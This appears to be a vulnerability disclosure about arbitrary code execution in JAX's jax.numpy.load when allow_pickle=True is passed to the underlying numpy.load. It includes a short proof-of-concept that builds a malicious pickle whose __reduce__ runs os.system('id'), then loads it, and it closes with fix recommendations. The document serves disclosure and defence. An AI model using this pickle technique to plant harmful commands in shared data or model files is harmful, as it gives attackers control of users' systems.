Arbitrary Code Execution in jax.numpy.load via Insecure Deserialization
Summary
The jax.numpy.load function in the JAX library is vulnerable to arbitrary code execution when loading a maliciously crafted .npy file if the allow_pickle parameter is set to True. This occurs because jax.numpy.load is a wrapper around numpy.load, which uses the inherently insecure pickle module for deserialization when allow_pickle=True.
Vulnerability Details
- Component:
jax.numpy.load - File:
jax/_src/numpy/lax_numpy.py - Vulnerability Type: Insecure Deserialization (CWE-502)
- Impact: Arbitrary Code Execution (ACE)
The implementation of jax.numpy.load is as follows:
@export
def load(file: IO[bytes] | str | os.PathLike[Any], *args: Any, **kwargs: Any) -> Array:
# ... (docstring)
out = np.load(file, *args, **kwargs)
# ... (post-processing)
return out
By passing allow_pickle=True as a keyword argument, the underlying np.load call will use pickle.load to deserialize the file content. An attacker can provide a specially crafted file that, when unpickled, executes arbitrary system commands.
Proof of Concept (PoC)
Steps to Reproduce:
- Create a malicious
.npyfile using the following script:
import jax.numpy as jnp
import os
import pickle
class Malicious:
def __reduce__(self):
return (os.system, ('id',))
with open('malicious.npy', 'wb') as f:
pickle.dump(Malicious(), f)
- Load the malicious file using
jax.numpy.loadwithallow_pickle=True:
import jax.numpy as jnp
jnp.load('malicious.npy', allow_pickle=True)
- Observe the execution of the
idcommand.
Impact
An attacker can distribute malicious model files or data files in .npy format. If a user is convinced to load such a file using jax.numpy.load(..., allow_pickle=True), the attacker gains full control over the user's system.
Recommendations
- Deprecate or restrict
allow_pickle: Discourage the use ofallow_pickle=Trueinjax.numpy.load. - Documentation Warning: Add a prominent security warning to the
jax.numpy.loaddocstring, similar to the one innumpy.load. - Safe Alternatives: Encourage users to use safer serialization formats like
safetensorsormsgpack(as used in Flax/Orbax).